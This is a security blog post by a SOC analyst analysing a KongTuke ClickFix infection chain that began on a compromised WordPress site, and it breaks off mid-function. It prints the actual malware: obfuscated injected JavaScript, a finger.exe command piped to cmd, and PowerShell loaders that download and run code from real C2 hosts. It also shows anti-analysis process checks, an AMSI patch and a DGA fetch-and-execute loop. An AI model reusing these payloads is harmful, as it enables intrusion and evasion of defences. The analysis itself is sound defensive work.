====================
== Alert Overload ==
====================
Tales from a SOC analyst

KongTuke: ClickFix on Steroids

KongTuke: ClickFix on Steroids

KongTuke is a threat actor that has recently increased their usage of ClickFix and ClickFix-styled attacks. They’ve begun to utilize a branching infection path based on the domain status of an infected device. If the device is domain joined, it will receive a different payload from non-domain joined devices. As Huntress notes, this is likely to identify and target Active Directory environments (also go read that write up, it’s way better than this!).

Recently, I observed a KongTuke ClickFix incident stemming from a compromised WordPress domain. Much like the Huntress write up, this incident utilized the domain checking capabilities recently observed in KongTuke attacks. For this incident, I followed the workgroup path instead of the domain joined path.

Compromised WordPress Domain

alt text

The initial compromised domain belongs to Kenco, a company that “… supplies the construction industry with a wide selection of attachments to make excavator, wheel loader, dozer and backhoe machines more productive and profitable.”. This domain was accessed by a user via a promotional email that was sent to their business email.

The domain was injected with an async script loading 6j6s.js from wilknnson.com. The contents of which are below.

6j6s.js 
var _0x48b1b3=_0x1c4a;function _0x1c4a(_0x2b3ab4,_0x16286d){_0x2b3ab4=_0x2b3ab4-0x1d2;var _0x24e15b=_0x24e1();var _0x1c4aaf=_0x24e15b[_0x2b3ab4];return _0x1c4aaf;}(function(_0x3386dc,_0x3b7391){var _0x25664e=_0x1c4a,_0x2947bd=_0x3386dc();while(!![]){try{var _0x5d8c28=-parseInt(_0x25664e(0x1f2))/0x1+-parseInt(_0x25664e(0x1d7))/0x2*(-parseInt(_0x25664e(0x200))/0x3)+-parseInt(_0x25664e(0x1f0))/0x4+parseInt(_0x25664e(0x1dc))/0x5*(-parseInt(_0x25664e(0x1ed))/0x6)+-parseInt(_0x25664e(0x1e9))/0x7*(-parseInt(_0x25664e(0x1da))/0x8)+-parseInt(_0x25664e(0x1d6))/0x9+parseInt(_0x25664e(0x1ec))/0xa;if(_0x5d8c28===_0x3b7391)break;else _0x2947bd['push'](_0x2947bd['shift']());}catch(_0x122a60){_0x2947bd['push'](_0x2947bd['shift']());}}}(_0x24e1,0x671e2));function setCookie(_0x5d3059,_0x32f3a2,_0x55938e){var _0x518d0c=_0x1c4a,_0x30137a='';if(_0x55938e){var _0x3295c7=new Date();_0x3295c7[_0x518d0c(0x1d5)](_0x3295c7[_0x518d0c(0x1df)]()+_0x55938e*0x18*0x3c*0x3c*0x3e8),_0x30137a=_0x518d0c(0x1fa)+_0x3295c7['toUTCString']();}document[_0x518d0c(0x1ea)]=_0x5d3059+'='+(_0x32f3a2||'')+_0x30137a+_0x518d0c(0x1e2);}function getCookie(_0x1bda7a){var _0x2c556a=_0x1c4a,_0x3b586f=_0x1bda7a+'=',_0x2517a0=document[_0x2c556a(0x1ea)][_0x2c556a(0x1db)](';');for(var _0x32140a=0x0;_0x32140a<_0x2517a0[_0x2c556a(0x1e0)];_0x32140a++){var _0x217a00=_0x2517a0[_0x32140a];while(_0x217a00[_0x2c556a(0x205)](0x0)=='\x20')_0x217a00=_0x217a00[_0x2c556a(0x201)](0x1,_0x217a00[_0x2c556a(0x1e0)]);if(_0x217a00[_0x2c556a(0x1d4)](_0x3b586f)==0x0)return _0x217a00[_0x2c556a(0x201)](_0x3b586f[_0x2c556a(0x1e0)],_0x217a00[_0x2c556a(0x1e0)]);}return null;}function eraseCookie(_0x3129de){var _0x5bce45=_0x1c4a;document['cookie']=_0x3129de+_0x5bce45(0x1dd);}if(getCookie(_0x48b1b3(0x1e5))===null){setCookie('isCompleted',!![],0x4);var HttpClient=function(){var _0x406129=_0x48b1b3;this[_0x406129(0x203)]=function(_0x2a0716,_0x127250){var _0x26fe14=_0x406129,_0x575a34=new XMLHttpRequest();_0x575a34['onreadystatechange']=function(){var _0x3e0535=_0x1c4a;if(_0x575a34[_0x3e0535(0x1fb)]==0x4&&_0x575a34['status']==0xc8)_0x127250(_0x575a34[_0x3e0535(0x1f7)]);},_0x575a34['open'](_0x26fe14(0x1d2),_0x2a0716,!![]),_0x575a34[_0x26fe14(0x1e6)](null);};},client=new HttpClient();client['get']('https://www.cloudflare.com/cdn-cgi/trace',function(_0x38719f){var _0x1b2772=_0x48b1b3;_0x38719f=_0x38719f[_0x1b2772(0x1f9)]()[_0x1b2772(0x1db)]('\x0a')[_0x1b2772(0x1f4)](function(_0x2f41e6,_0x4991fa){return _0x4991fa=_0x4991fa['split']('='),(_0x2f41e6[_0x4991fa[0x0]]=_0x4991fa[0x1],_0x2f41e6);},{});function _0x5e5a8d(){var _0x39be10=_0x1b2772,_0x7cc949=null;if((navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)](_0x39be10(0x1f6))||navigator['userAgent'][_0x39be10(0x1d4)](_0x39be10(0x1fe)))!=-0x1)_0x7cc949=_0x39be10(0x206);else{if(navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)]('Edg')!=-0x1)_0x7cc949=_0x39be10(0x1f5);else{if(navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)]('Chrome')!=-0x1)_0x7cc949=_0x39be10(0x1d8);else{if(navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)]('Safari')!=-0x1)_0x7cc949=_0x39be10(0x208);else{if(navigator[_0x39be10(0x1e8)]['indexOf']('Firefox')!=-0x1)_0x7cc949=_0x39be10(0x204);else navigator[_0x39be10(0x1e8)]['indexOf'](_0x39be10(0x1de))!=-0x1||!!document[_0x39be10(0x1ff)]==!![]?_0x7cc949='IE':_0x7cc949='Unknown';}}}}return _0x7cc949;}function _0x50a856(){var _0x2c7254=_0x1b2772;let _0x21b04a=window['navigator']['userAgent'][_0x2c7254(0x1d9)](),_0x5d753b=/(macintosh|macintel|macppc|mac68k|macos)/i,_0x1d6fa2=/(win32|win64|windows|wince)/i,_0x3fd23b=/(iphone|ipad|ipod)/i,_0x2f8ccd=null;if(_0x5d753b[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd='macos';else{if(_0x3fd23b[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd=_0x2c7254(0x1fd);else{if(_0x1d6fa2[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd='windows';else{if(/android/[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd='android';else!_0x2f8ccd&&/linux/['test'](_0x21b04a)&&(_0x2f8ccd=_0x2c7254(0x1e7));}}}return _0x2f8ccd;}var _0x3a66bf=_0x50a856(),_0x5b7a7e=_0x5e5a8d();if(!![]){var _0x4bdb62=window['location'][_0x1b2772(0x202)],_0x103212=window[_0x1b2772(0x1f8)][_0x1b2772(0x1e8)][_0x1b2772(0x1d9)](),_0x16b0af='https://wilknnson.com',_0x38e8d1=_0x16b0af+_0x1b2772(0x1e4)+_0x3a66bf+_0x1b2772(0x207)+btoa(_0x38719f['ip'])+_0x1b2772(0x1fc)+btoa(_0x4bdb62)+_0x1b2772(0x1ef)+btoa(_0x5b7a7e)+'&ua='+btoa(_0x103212)+_0x1b2772(0x1e1)+btoa(_0x16b0af)+_0x1b2772(0x1d3)+btoa(_0x38719f['loc'])+_0x1b2772(0x1ee),_0x1a13a4=new XMLHttpRequest();_0x1a13a4['onreadystatechange']=function(){var _0x199080=_0x1b2772;if(_0x1a13a4[_0x199080(0x1fb)]==XMLHttpRequest['DONE']){var _0xb569ef=_0x1a13a4[_0x199080(0x1f7)];console[_0x199080(0x1f3)](_0xb569ef),_0xb569ef[_0x199080(0x1e0)]<0x23?console[_0x199080(0x1f3)](_0x199080(0x1eb)):document[_0x199080(0x1e3)](_0x1a13a4[_0x199080(0x1f7)]);}},_0x1a13a4[_0x1b2772(0x1f1)]('GET',_0x38e8d1,!![]),_0x1a13a4[_0x1b2772(0x1e6)](null);}});}function _0x24e1(){var _0x232a31=['Safari','test','GET','&loc=','indexOf','setTime','4116852BfbJyH','793472yVYsHY','Chrome','toLowerCase','32AcNIEK','split','593555uWTXlt','=;\x20Path=/;\x20Expires=Thu,\x2001\x20Jan\x201970\x2000:00:01\x20GMT;','MSIE','getTime','length','&domain=',';\x20path=/','write','/js.php?device=','isCompleted','send','linux','userAgent','1253378DiazRY','cookie','Jquery.js\x20is\x20loaded','6663300pXwbEf','42pparah','&is_ajax=1','&browser=','147456jGLEYh','open','31643WNNSda','log','reduce','Edge','Opera','responseText','navigator','trim',';\x20expires=','readyState','&refferer=','ios','OPR','documentMode','3MShqDi','substring','href','get','Firefox','charAt','opera','&ip='];_0x24e1=function(){return _0x232a31;};return _0x24e1();}

In typical ClickFIx fashion, this script detects the device type and loads an appropriate lure.

Infection Chain

This incident follows a Windows attack chain.

ClickFix Command

The lure copies a finger.exe command to the clipboard and asks the user to execute it via Windows Key + R.

The command is:

cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe [email protected]|cmd"

Captcha ID: 1ef45r

This command creates a copy of the finger utility at the %temp% directory. This copy is called ct.exe and is used to query the remote server at [email protected]. Once queried, the response is piped to CMD for execution.

Stage One

The finger command pulls byte encoded PowerShell code. This code utilizes a common obfuscation method through char array obfuscation. Human-readable code is stored as a byte array and is dynamically converted back into a char array for execution.

powershell.exe -ep bypass -c iex (-join [char[]]@(10,32,32,32,32,73,110,118,111,107,101,45,87,101,98,82,101,113,117,101,115,116,32,45,85,114,105,32,36,40,45,106,111,105,110,40,39,110,122,122,118,58,47,47,52,53,46,54,49,46,49,51,56,46,50,50,52,47,104,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,50,48,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,50,48,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,32,45,79,117,116,70,105,108,101,32,40,91,73,79,46,80,97,116,104,93,58,58,67,111,109,98,105,110,101,40,91,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,36,40,45,106,111,105,110,40,39,82,103,103,99,122,116,114,107,122,102,101,85,114,107,114,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,57,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,57,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,44,32,36,40,45,106,111,105,110,40,39,113,97,112,103,110,114,46,110,113,49,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,50,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,50,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,41,59,10,38,32,40,91,73,79,46,80,97,116,104,93,58,58,67,111,109,98,105,110,101,40,91,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,36,40,45,106,111,105,110,40,39,77,98,98,120,117,111,109,102,117,97,122,80,109,102,109,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,49,52,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,49,52,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,44,32,36,40,45,106,111,105,110,40,39,108,118,107,98,105,109,46,105,108,49,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,55,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,55,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,41,59,10,82,101,109,111,118,101,45,73,116,101,109,32,40,91,73,79,46,80,97,116,104,93,58,58,67,111,109,98,105,110,101,40,91,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,36,40,45,106,111,105,110,40,39,88,109,109,105,102,122,120,113,102,108,107,65,120,113,120,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,51,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,51,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,44,32,36,40,45,106,111,105,110,40,39,98,108,97,114,121,99,46,121,98,49,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,49,55,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,49,55,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,41,59,10,10,32,32,32,32))

Decoded, this script uses further obfuscation methods to hide the domain it’s pulling code from. It retrieves a PowerShell payload and executes it.

Invoke-WebRequest -Uri $(-join('nzzv://45.61.138.224/h'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})) -OutFile ([IO.Path]::Combine([Environment]::GetFolderPath($(-join('RggcztrkzfeUrkr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))), $(-join('qapgnr.nq1'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))));
& ([IO.Path]::Combine([Environment]::GetFolderPath($(-join('MbbxuomfuazPmfm'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))), $(-join('lvkbim.il1'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))));
Remove-Item ([IO.Path]::Combine([Environment]::GetFolderPath($(-join('XmmifzxqflkAxqx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))), $(-join('blaryc.yb1'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))));

Stage Two

The script pulled from the PowerShell loader contains a BXOR’d base64 array. Annoyingly enough, when decoded, this base64 array is another base64 encoded script. I had to reverse the same format five times before I got the actual payload. Security through obscurity I guess.


$esWBdQ = 8470
$myWtWT = 9494
$Orkufq = 9816
$KJwada = 7066
$eqqvTW = "<base64>"
$ziqftT = 231

function global:YMmXLQ {
    $erxGVv = [System.Convert]::FromBase64String($eqqvTW)
    $SBmmIl = @()
    foreach ($b in $erxGVv) {
        $SBmmIl += ($b -bxor $ziqftT)
    }
    $XAVPdi = [System.Text.Encoding]::UTF8.GetString($SBmmIl)
    return $XAVPdi
}

$VwIImY = YMmXLQ

$dmEJwu = 'i' + 'e' + 'x'
& $dmEJwu $VwIImY

I won’t post all five stages, but it really was decoding the same thing 5 times 💀

On the fifth base64 decode, the actual payload was revealed. This performs checks for various analysis processes. It also contains the code used to check the domain status of the device. Depending on the status of the device, a different POST body is sent off to the C2. Regardless of status, this body includes the AntiVirusProduct name.

Note: I followed the WORKGROUP non-domain path.


$m = @(
    "wireshark", "processhacker", "fiddler", "procexp",
    "procmon", "sysmon", "ida", "x32dbg", "x64dbg", "ollydbg", "cheatengine",
    "scylla", "scylla_x64", "scylla_x86", "immunitydebugger", "windbg",
    "reshacker", "reshacker32", "reshacker64", "hxd", "ghidra", "lordpe",
    "tcpview", "netmon", "sniffer", "snort", "apimonitor", "radare2", "procdump",
    "dbgview", "de4dot", "detectiteasy", "detectit_easy", "dumpcap", "netcat",
    "bintext", "dependencywalker", "dependencies", "prodiscover", "sysinternals",
    "netlimiter", "sandboxie", "vmware", "virtualbox", "vmtools", "VMwareService", "VMwareTray", "VBoxService", "VBoxTray",
    "qemu-ga", "prl_cc"
)
Get-Process | ForEach-Object {
    $processName = $_.Name.ToLower()
    foreach ($tool in $m) {
        if ($processName -like "*$tool*") {
            Write-Host "***" 
            exit
        }
    }
}
$systemInfo = systeminfo | findstr /C:"Domain"
$domain = $systemInfo -replace ".*Domain:\s*"
if ($domain -eq 'WORKGROUP') {   
    iwr 'http://45.61.138.224/n' `
        -Method POST `
        -Body @{
            message = "ABCD111`n$(
                Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct |
                Select-Object -ExpandProperty DisplayName |
                Out-String
            )"
        } `
        -ContentType 'application/x-www-form-urlencoded' `
        -UseBasicParsing | iex
    
}
else {
   
    iwr 'http://45.61.138.224/n' `
        -Method POST `
        -Body @{
            message = "BCDA222`n$(
                Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct |
                Select-Object -ExpandProperty DisplayName |
                Out-String 
            )"
        } `
        -ContentType 'application/x-www-form-urlencoded' `
        -UseBasicParsing | iex

    
}

Stage Three

The POST request should look something like this:

iwr "http://45.61.138.224/n" -Method POST -Body @{message = "ABCD111`nWindows Defender"} -ContentType 'application/x-www-form-urlencoded' -OutFile workgroup_response -Verbose

The response to the POST included code that built a curl request from an encoded array.

$rivflc='ur' ;
set-alias jueipa2a c$($rivflc)l;
$dnhatiwgpbfvlq=(7777,7789,7789,7785,7731,7720,7720,7788,7794,7795,7791,7723,7722,7773,7719,7789,7784,7785,7720,7722,7719,7785,7777,7785,7736,7788,7734,7727,7724,7774,7730,7726,7771,7774,7722,7718,7730,7723,7774,7721,7718,7725,7726,7772,7722,7718,7770,7730,7723,7729,7718,7727,7726,7773,7727,7724,7771,7722,7728,7772,7773,7722,7772);
$cdxbmtwslz=('reicporet','get-cmdlet');
$yftxulj=$dnhatiwgpbfvlq;
foreach($gqjdfh in $yftxulj){$hjklmu=$gqjdfh;
$kogrsv=$kogrsv+[char]($hjklmu-7673);
$iwbmvnlsgc=$kogrsv;
 $tyackidmsbf=$iwbmvnlsgc};
$wspmkirhvuq[2]=$tyackidmsbf;
$oavhksw='rl';
$qzrkbwdahsipj=1;
.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(jueipa2a -useb $tyackidmsbf)

To decode this, you can simply execute the array operation and print out the result.

$array=(7777,7789,7789,7785,7731,7720,7720,7788,7794,7795,7791,7723,7722,7773,7719,7789,7784,7785,7720,7722,7719,7785,7777,7785,7736,7788,7734,7727,7724,7774,7730,7726,7771,7774,7722,7718,7730,7723,7774,7721,7718,7725,7726,7772,7722,7718,7770,7730,7723,7729,7718,7727,7726,7773,7727,7724,7771,7722,7728,7772,7773,7722,7772);
foreach($x in $array){
    $char=$x;
    $char_array=$char_array+[char]($char-7673);
    $iwbmvnlsgc=$char_array;
    $finchar_array=$iwbmvnlsgc
};

# Domain: hxxp[://]syzv21d[.]top/1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c

The retrieved payload is executed via Invoke-Expression.

Stage Four

This stage introduces more heavily obfuscated code. I’ve included a snippet of the payload below, to highlight some of the techniques used. Essentially, this payload uses domain generation alg to pull some code via the base64 encoded command. It also does an AMSI patch and takes and encoded string, decodes it, and executes. See the Huntress write up for better details on this. It’s nifty.

I really like the very annoying char operations they use to obfuscate everything. Unfortunately, they use this for everything after this point. It’s only fun the first time, after that it just becomes annoying.

$rea = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$proa = Add-Type -MemberDefinition $rea -name 'Win32ShowWindowAsync' -namespace 'Win32Functions' -PassThru;$wt = New-Guid;$Host.UI.RawUI.WindowTitle = $wt;$Pr = (Get-Process | Where-Object { $_.MainWindowTitle -eq $wt });$proa::ShowWindowAsync($Pr.'MainWindowHandle', 0)

start-process "powershell" -args "-e <base64>" -windowstyle hidden;

$mzekndqoyp=$executioncontext;$edesalisinanaroresesonoron = ([cHAR[]]@((452864/(25985024/(12184-5528))),(7352-(4397+2886)),(391080/(308+2951))) -join '');

function c27y3zjqxphs08nor6mua5fbg9w  {param($7edv853olgxh6p1 )

$d6frko18xgy0pac = [System.Convert].((-join (@((-1775+(-6567+(84197304/10008))),(1126-1025),(408552/(9450-5928)),(727034/9442),(587719/(9041-(8786-(-1705+(57316065/7885))))),(10353-10237),(1043120/(13363-(9630-(3485+(6594-3782))))),(-6688+(10350-3551)),(397300/3973))| ForEach-Object { [char]$_ })))((-join (@((315770/4511),(1061796/9314),(750249/(11704-4945)),(396869/(6921541/(8195211/4311))),(-1858+(16888872/8778)),(849720/(7479+1281)),(7484-(12217802/(148+(7098510/4701)))),(750228/(1983276/(724905/(3209-(10667-(82635279/(20266885/(2391+(825240/(4496+3439)))))))))),(-6784+(225+6613)),(-2300+2352),(-10080+(23791583/2341)),(-7124+7240),(8607-(15613-(13808-6688))),(7120-7015),(6908-(1407+5391)),(8232-8129))| ForEach-Object { [char]$_ }))).((-join (@((259515/(103+(25137464/(12346-5064)))),(-1521+1631),(941994/(12233-4250)),(-4292+(1495+2908)),(763231/(-2255+(212+(19386-(3579+(3330+3301)))))),(-5159+5260))| ForEach-Object { [char]$_ })))($null, @($7edv853olgxh6p1))
  $0rgifljwdktcpsh= $3ncfms07brjety6.(([char[]]@((707870/(97775790/9807)),(3336-(1986290/(1573682/2563))),(-305+421),(587598/(87142564/(6944+2844))),(642026/(1165+(35169513/8493))),(7091-6975),(4731-4630),(9752-9637)) -join ''))("xiquayg9wo0c")
    $cdj7kh3y9t4p12o = $d6frko18xgy0pac
    $tvagb0cm1dxzfu3 = $(for ($nwatxvpdh51colu = 0; $nwatxvpdh51colu -lt $cdj7kh3y9t4p12o.((-join (@((1588-1480),(1987-(7657160/(-5703+(9858-95)))),(-9939+10049),(7561-7458),(277936/2396),(1267-(9173744/(14572-6684))))| ForEach-Object { [char]$_ }))); ) {
        for ($zyh49qjr5aogvnc = 0; $zyh49qjr5aogvnc -lt $0rgifljwdktcpsh.(([system.String]::new(@((7139-(8535634/1214)),(-8278+8379),(956560/8696),(-3282+(29581515/8739)),(-3262+3378),(315328/(8210656/(19069736/7042))))))); $zyh49qjr5aogvnc++) {
            $cdj7kh3y9t4p12o[$nwatxvpdh51colu] -bxor $0rgifljwdktcpsh[$zyh49qjr5aogvnc]
            $nwatxvpdh51colu++
            if ($nwatxvpdh51colu -ge $cdj7kh3y9t4p12o.(([system.String]::new(@((168112/(3731-(6156507/4053))),(8321-(58600380/(30654700/4300))),(360250/3275),(242050/2350),(9588-(10245-(4514320/(52005200/(1757+7148))))),(-543+647)))))) {
                $zyh49qjr5aogvnc = $0rgifljwdktcpsh.(([system.String]::new(@((809892/(15424-(15942-8017))),(5619-(28677046/5197)),(362340/3294),(-71+174),(-4316+4432),(9609-9505)))))
            }
        }
    })
        $t83x9o2mapw1vjf = New-Object ((-join (@((8944-(8912-(-621+(-7869+(1054+(5934+1553)))))),(-7112+7233),(1050870/9138),(1066968/9198),(897284/(6766+(-7672+(6941+2849)))),(5312-(-1469+(48752304/7307))),(8942-(62476608/(16529-9506))),(415735/5695),(3640-3561),(-1601+1647),(1854-(9794824/5512)),(993840/(17106-7266)),(-3721+(13158-9328)),(602397/(-1189+(13744-7128))),(908124/7966),(1071697/(19038-(18201-(5259+2761)))),(294899/(-5398+(3627+5324))),(792744/(-1758+8592)),(3491-3377),(565701/5601),(177801/(15602496/(12410-(36438504/9348)))),(952442/(84077036/(81873598/8509))))| ForEach-Object { [char]$_ })))( , $tvagb0cm1dxzfu3 )

            $38rwkse62yg4qa0 = New-Object (([system.String]::new(@((-8595+(78188780/(11023-(1202+(9129-8318))))),(824010/6810),(8972-(873+7984)),(487-371),(-8874+(27669925/3083)),(901212/8268),(299276/6506),(4477-4404),(6569-(3630+2860)),(382444/8314),(-7894+7971),(-6485+(1896+4690)),(648877/5953),(467976/(36670768/(85396964/(13719-3901)))),(44460/390),(589-468),(-190+273),(200448/(872+(6639136/7756))),(5686-(-3471+(16990-(2479+5468)))),(303404/3004),(927902/(15661-6095)),(-8353+(81142118/(11798-(-1987+4196))))))))
        $izwbvxnk1dy70ua = New-Object ((-join (@((4826-(15922251/3357)),(109021/901),(2958-2843),(2984-(4343-(-991+2466))),(415009/4109),(-9208+9317),(-796+842),(3217-3144),(-8004+(10689-2606)),(2168-(8650-(15707-(17531890/(1949-39))))),(-7656+(12645-4922)),(4881-(7626-(14160048/(11781-6823)))),(-2626+2735),(10175-(69183125/6875)),(8940-8826),(310-(361361/(-4560+(55236287/8783)))),(-6773+6888),(3006-2891),(647115/6163),(-4651+4762),(-2932+(-6985+10027)),(8991-(6257+2688)),(-8230+(15723-7422)),(54290/445),(8751-8646),(-7603+(10129795/1313)),(710812/(73581888/8592)),(8205-8089),(785346/(12696427/1843)),(-6839+6940),(4664-4567),(-4817+(21364062/4337)))| ForEach-Object { [char]$_ })))($t83x9o2mapw1vjf, ([IO.Compression.CompressionMode]::Decompress))
            $izwbvxnk1dy70ua.(([system.String]::new(@((208035/3105),(-9809+(8022+1898)),(-3220+3332),(900119/(14275441/(-473+(-444+(-1187+4023))))),(574560/(11935-(9775-(9523800/2035)))),(-5756+5867)))))( $38rwkse62yg4qa0 )
        $izwbvxnk1dy70ua.((-join (@((640-573),(-6092+6200),(966477/8707),(-8618+8733),(371074/3674))| ForEach-Object { [char]$_ })))()
                $t83x9o2mapw1vjf.((-join (@((7401-7334),(789-681),(2203-(9034-6942)),(4798-(3203+1480)),(-6125+(-3708+(16915-(40329237/(10776-(-3755+(12585-3831))))))))| ForEach-Object { [char]$_ })))()
                [byte[]] $r6wh7i9p8fzv1lx = $38rwkse62yg4qa0.((-join (@((9596-(89127440/(17950-(14116-(11614-6078))))),(163-(4316/(7370-(11739-4452)))),(-1416+1481),(-9120+(1614+(3413760/(-2611+3059)))),(-6830+(5861+1083)),(-8448+8545),(1099406/(3539+(4209+1338))))| ForEach-Object { [char]$_ })))()
 $icgbqjf6uv18y2r=$r6wh7i9p8fzv1lx
    return $icgbqjf6uv18y2r
}
set-alias gotoany ([char[]]@((30975/(870840/(3137976/1063))),(896779/(2023+6856)),(3121-3001)) -join '')
[System.Text.Encoding]::ascii.(([char[]]@((-2378+2449),(-8442+8543),(1133668/9773),(450275/(12481-7056)),(-2571+(12797-(14423-4313))),(-1135+1249),(5330-5225),(1007710/(71840562/7842)),(895894/8698)) -join ''))((c27y3zjqxphs08nor6mua5fbg9w "<encoded string>"))|gotoany;

The base64 encoded execution decodes to the following DGA - again, see Huntress.

$random = New-Object ('System.Random')([int]((((Get-Date).DayOfYear+3) / 7) +2024)*558964)
$domainNames = @()
$characters = 'abcdefghijklmnopqrstuvwxyz0123456789'
$numDomains = 10

for ($j = 0;
 $j -lt $numDomains;
 $j++) {
    $result = ""
    for ($i = 0;
 $i -lt 15;
 $i++) {
        $result += $characters[$random.Next(0, 36)]
    }
    $domainNames += $result + '.top'
}

foreach($domainname in $domainNames){
	
	try{
		curl -useb "$domainname/1.php?s=04e1ab2b-3f93-46fa-9aed-c3a2a3f126c9"|iex;

break;

		
	}catch{}
}

The encoded string at the end is GZIP data that gets decompressed and returned as an executable string after processing through the c27y3zjqxphs08nor6mua5fbg9w function (renamde decode below).

function decode  {param($encoded_string )

